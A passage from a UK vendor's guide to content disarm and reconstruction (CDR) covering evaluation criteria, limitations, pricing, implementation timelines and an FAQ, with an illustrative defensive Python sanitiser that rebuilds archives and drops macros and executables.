What to look for

When evaluating CDR solutions, focus on these criteria:

  • CDR level: Level 3 (positive selection with template-based reconstruction) is the gold standard. Lower levels sacrifice usability or leave structural vulnerabilities
  • File type coverage: Check the vendor supports all file types your business actually processes
  • Processing speed: For inline deployment, sub-second processing is a must
  • Policy flexibility: Can you configure different policies for different file sources, types, and destinations?
  • Recursive processing: Can the system handle archives within archives? Attackers love nesting malicious files inside multiple layers of compression
  • Data residency: For UK businesses handling sensitive data, check where files are processed. UK-based processing avoids data sovereignty concerns
  • Integration options: Does it fit your existing infrastructure (email, web apps, file servers)?
  • G-Cloud availability: If you're a public sector organisation, check whether the vendor is on the G-Cloud framework for streamlined procurement

Vendor consolidation note: The CDR market is actively consolidating. Menlo Security acquired Votiro in February 2025, and Everfox acquired Garrison Technology in August 2024. If you're evaluating vendors, check that your chosen provider is actively investing in CDR development and has a product roadmap that aligns with your needs.

CDR limitations: what it can't do

We'd be doing you a disservice if we didn't mention what CDR can't handle. No security technology is perfect, and understanding the gaps helps you build defences that actually work.

  • Executable files: CDR can't sanitise .exe or .dll files. These are legitimate software delivery mechanisms, but they can't be rebuilt from clean templates the way documents can. You'll still need separate controls (reputation analysis, sandboxing, endpoint detection) for executables.
  • Password-protected files: CDR can't process files it can't decrypt. If someone sends you a password-protected ZIP file, the CDR system needs the password before it can sanitise the contents. Some solutions (like OPSWAT) can retain the password protection on the cleaned file, but there's an operational overhead in getting passwords from senders.
  • Legitimate macros: CDR can't reliably distinguish between a malicious macro and a legitimate one your finance team built. Level 3 positive selection systems do the best job of preserving macro functionality, but some legitimate active content may still be removed. Organisations often handle this with exception policies for trusted internal sources.
  • File format edge cases: Complex files can occasionally show minor compatibility issues after CDR processing - font rendering changes, slight image quality shifts, or interactive PDF form fields behaving differently. These issues are uncommon with modern Level 3 systems, but they're worth testing for with your specific file types.
  • Non-file attack vectors: CDR only handles file-based threats. It won't stop credential theft, social engineering, or attacks that exploit vulnerabilities in network protocols. It's one piece of the puzzle, not the whole picture.
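To make the positive-selection idea, the "recursive processing" criterion above and the executable and password-protected limitations concrete, here is an added toy sanitiser in Python. It is not Red Eagle Tech's or any vendor's code: the allowlist of Word parts, the nesting limit and the sample archive are constructed for illustration, and it only selects parts rather than validating them against the format specification the way a real Level 3 engine does.

```python
import io
import zipfile

MAX_DEPTH = 3  # reject archives nested deeper than this (zip-in-zip-in-zip tricks)
# Parts a plain Word document needs; anything else (vbaProject.bin, activeX/, embeddings/) is never copied.
ALLOWED_DOCX = {"[Content_Types].xml", "_rels/.rels", "word/document.xml",
                "word/styles.xml", "word/settings.xml", "word/_rels/document.xml.rels"}

class SanitiseError(Exception):
    """The file cannot be rebuilt safely: encrypted, nested too deep, or corrupt."""

def sanitise(data: bytes, depth: int = 0) -> tuple[bytes, list[str]]:
    """Rebuild a ZIP container (archive or Office package) into a fresh one; returns
    (clean_bytes, dropped_names). A real engine also validates every kept XML part."""
    if depth > MAX_DEPTH:
        raise SanitiseError("archive nesting too deep")
    try:
        src = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        raise SanitiseError("not a ZIP container (corrupt, or password-protected Office file)") from None
    is_office = "word/document.xml" in src.namelist()
    buf, dropped = io.BytesIO(), []
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            name, lower = info.filename, info.filename.lower()
            if info.flag_bits & 0x1:  # ZIP general-purpose bit 0: entry is encrypted
                raise SanitiseError(f"encrypted entry, password needed: {name}")
            if (is_office and name not in ALLOWED_DOCX) or lower.endswith((".exe", ".dll")):
                dropped.append(name)  # unknown Office part, or an executable: never copied
                continue
            payload = src.read(name)
            if not is_office and lower.endswith((".zip", ".docx", ".docm")):
                payload, inner = sanitise(payload, depth + 1)  # recurse into nested containers
                dropped += [f"{name}!{x}" for x in inner]
            dst.writestr(name, payload)  # written into a brand-new archive, never copied raw
    return buf.getvalue(), dropped

def zip_bytes(entries: dict) -> bytes:  # helper: in-memory ZIP from {name: bytes}
    b = io.BytesIO()
    with zipfile.ZipFile(b, "w") as z:
        for n, d in entries.items():
            z.writestr(n, d)
    return b.getvalue()

def build_sample() -> bytes:
    """Constructed input (placeholders, not real malware): a .docm with a VBA part, a nested ZIP with a fake .exe, a text file."""
    docm = zip_bytes({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>",
                      "word/vbaProject.bin": b"PLACEHOLDER-VBA"})
    return zip_bytes({"invoice.docm": docm, "extras.zip": zip_bytes({"tool.exe": b"MZ"}),
                      "readme.txt": b"hello"})
```

Running `sanitise(build_sample())` returns a rebuilt archive whose dropped list names the VBA part inside the document and the executable inside the nested ZIP, while the text file passes through. A production engine would additionally rename the cleaned .docm to .docx and rewrite [Content_Types].xml and the relationship parts so nothing references the removed macro project.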

The honest take: CDR is brilliant at what it does - preventing file-based threats from reaching your people. But don't fall into the trap of thinking it covers everything. The strongest security setups use CDR alongside endpoint detection, network monitoring, and solid incident response planning. If you're building a complete security stack from scratch, our system integration guide covers how to connect these technologies effectively.

UK costs and implementation

CDR pricing varies significantly depending on the deployment model, file volume, and vendor. Here's what UK businesses can realistically expect to pay.

Pricing by deployment model

Deployment model           | Typical UK cost         | Pricing model
Cloud API (SME)            | From £50/month          | Per-file or monthly subscription
Cloud API (mid-market)     | £250-£4,000/month       | Tiered subscription based on file volume
Enterprise platform        | £1,000-£5,000+/month    | Annual licensing with support contract
Network gateway appliance  | £5,000-£20,000+/year    | Hardware + annual licensing and support
Managed CDR service        | £2,000-£10,000/month    | Fully managed, includes infrastructure and monitoring
G-Cloud (public sector)    | From £165.75/unit       | Pre-negotiated framework pricing

For context, OPSWAT MetaDefender offers entry-level plans from around £1,000 per month, with mid-tier plans at £3,000-£5,000 per month for higher file volumes and more features. Everfox's Zero Trust CDR is available on the G-Cloud framework at £165.75 per unit for public sector organisations. Red Eagle Tech's CDR API starts from £50 per month, designed to make file security accessible to businesses of all sizes.

Budget 15-25% of your initial deployment costs annually for ongoing operational expenses - maintenance, software updates, support, and monitoring.

Implementation effort

How long CDR takes to deploy depends entirely on the approach you choose:

Phase                             | API integration      | Full gateway deployment
Research and preparation          | 2-3 weeks            | 4-8 weeks
Technical design and development  | 3-6 weeks            | 6-12 weeks
Testing and refinement            | 2-4 weeks            | 4-8 weeks
Deployment and monitoring         | 1-2 weeks            | 2-4 weeks
Total                             | 2-6 weeks (typical)  | 3-6 months

API-based deployments are by far the fastest path to production. OPSWAT claims basic MetaDefender setups can be operational within two hours, though that assumes pre-existing API expertise and minimal testing. A more realistic timeline for a proper API integration with testing and error handling is two to six weeks.

For gateway deployments, you're looking at infrastructure procurement, network architecture changes, integration with existing security systems, and extensive testing under realistic load. Plan for three to six months. Cross-domain solutions for defence and government environments, with their hardware-enforced security and assurance requirements, typically need six to twelve months.

Pilot first:

If you're not sure CDR is worth the investment, start with a pilot. Time-box it to 8-12 weeks, focus on your highest-risk file handling workflow (usually email or a customer file upload portal), and set clear success criteria before you begin. A successful pilot gives you quantifiable results to inform a broader rollout.

The ROI case for CDR

CDR is an investment, so let's talk numbers. The average UK data breach costs £3.29 million. In financial services, it's £5.74 million. The M&S attack in 2025 resulted in estimated losses of £300 million.

For a mid-sized business spending £3,000-£10,000 per year on cloud-based CDR, the maths is straightforward. If CDR reduces your expected breach costs by even 20-30% (a conservative estimate given that file-based threats are the dominant attack vector), the risk reduction value runs to £100,000-£400,000 annually. That's a payback period measured in months, not years.

£3.29M - average UK breach cost
£17M - maximum fine under new Cyber Security Bill
1-4 months - typical CDR payback period

Beyond direct breach cost reduction, CDR delivers indirect savings: reduced incident response costs (organisations with dedicated security controls save an average of $248,000 annually on incident response), avoided regulatory fines under the new Cyber Security and Resilience Bill, and productivity gains from preventing ransomware that would otherwise shut down operations for weeks.

Red Eagle Tech CDR API

We built our CDR API because we saw UK businesses struggling with file security. Most CDR solutions are designed for large enterprises with big budgets and dedicated security teams. We wanted to make the technology accessible to businesses of all sizes.

Our API is cloud-based with UK data processing, so your files never leave the country. Integration takes just a few lines of code, there's no infrastructure to maintain, and it starts from £50 per month. If your business handles file uploads, processes email attachments, or exchanges documents with external parties, it's worth a look.

What you get

  • Cloud-based CDR with UK data processing
  • Support for all major document formats
  • Simple REST API integration
  • Starts from £50/month

Frequently asked questions

Content disarm and reconstruction (CDR) is a cybersecurity technology that protects against file-based threats by stripping potentially dangerous elements from files and rebuilding clean versions. Unlike antivirus, CDR does not try to detect malware. It assumes every file could be risky and removes anything that does not match approved file format standards, then reconstructs a safe, usable copy.

Antivirus relies on signature-based detection, meaning it can only catch threats it already knows about. CDR takes the opposite approach: it assumes every file is potentially dangerous and strips out all risky elements regardless of whether they are known threats. This makes CDR effective against zero-day attacks, polymorphic malware, and other threats that bypass traditional antivirus.

Most CDR solutions support all common business file types including Microsoft Office documents (Word, Excel, PowerPoint), PDFs, image files (JPEG, PNG, GIF, TIFF), archive files (ZIP, RAR, 7Z), email attachments, and HTML files. Advanced CDR systems support over 200 file formats including specialised types like CAD files and medical imaging formats.

Modern CDR technology (Level 3) rebuilds files from clean templates while preserving text, formatting, images, tables, and even spreadsheet formulas. The resulting file looks and works like the original but without potentially dangerous elements like macros, embedded scripts, or hidden executable content. Most users cannot tell the difference.

CDR processing is fast. Most files are cleaned in under 200 milliseconds, which is practically instant. This speed makes CDR suitable for high-volume environments like email gateways processing thousands of messages per hour or file upload portals handling continuous submissions.

CDR is not a replacement for antivirus but a powerful complement to it. CDR excels at preventing file-based threats like weaponised documents, while antivirus handles other threat categories. Used together as part of a defence-in-depth strategy, they provide significantly stronger protection than either technology alone.

CDR removes elements that could potentially carry malicious payloads: macros, embedded scripts (like JavaScript in PDFs), ActiveX controls, OLE objects, DDE links, hidden executable content, and suspicious metadata. Safe content like text, formatting, images, and document structure is preserved and rebuilt into a clean file.

CDR pricing varies by deployment model. Cloud-based API services like Red Eagle Tech's CDR API start from around £50 per month. Mid-market enterprise platforms such as OPSWAT MetaDefender range from £1,000 to £5,000 per month depending on file volumes and features. Public sector organisations can access Everfox's Zero Trust CDR through the G-Cloud framework at £165.75 per unit. Full gateway appliance deployments with annual licensing typically cost £5,000 to £20,000 or more per year.

Any business that receives files from external sources should consider CDR. This includes organisations with file upload portals, businesses processing email attachments, companies sharing files with suppliers or partners, and any sector handling sensitive data. Industries with the highest adoption include defence, government, financial services, healthcare, and critical infrastructure.

Yes. This is one of CDR's biggest advantages. Because CDR does not rely on knowing about specific threats, it is inherently effective against zero-day exploits. If an attack depends on a malicious macro, script, or embedded object, CDR removes that element regardless of whether the specific attack has ever been seen before.

CDR cannot process encrypted files it cannot decrypt. If you receive a password-protected ZIP or encrypted PDF, the CDR system needs the decryption password before it can sanitise the contents. Some solutions like OPSWAT MetaDefender can retain the password protection on the cleaned output file. Organisations typically handle this by requesting passwords from senders or using exception policies for encrypted files from trusted sources.

Yes. Advanced CDR systems handle image files (JPEG, PNG, GIF, TIFF) by transcoding them between formats, which destroys any steganographic payloads hidden within the pixel data. The process also neutralises exploits targeting image processing library vulnerabilities. The reconstructed image looks the same to the human eye but any hidden data or malicious code embedded at the pixel level is eliminated.

Want to improve your file security?

At Red Eagle Tech, we help UK businesses protect against file-based threats with our CDR API as part of our wider IT operations and cybersecurity services. Whether you're handling file uploads, processing email attachments, or exchanging documents with external partners, we can help you clean up your file security without the complexity. We've also written about cybersecurity essentials for UK SMEs and common cyber security threats if you want to explore the broader picture.

Fancy a chat about your file security? Give us a shout and let's talk.


About the author

Ihor Havrysh

Software Engineer

Software Engineer at Red Eagle Tech with expertise in cybersecurity, Power BI, and modern software architecture. I specialise in building secure, scalable solutions and helping businesses navigate complex technical challenges with practical, actionable insights.
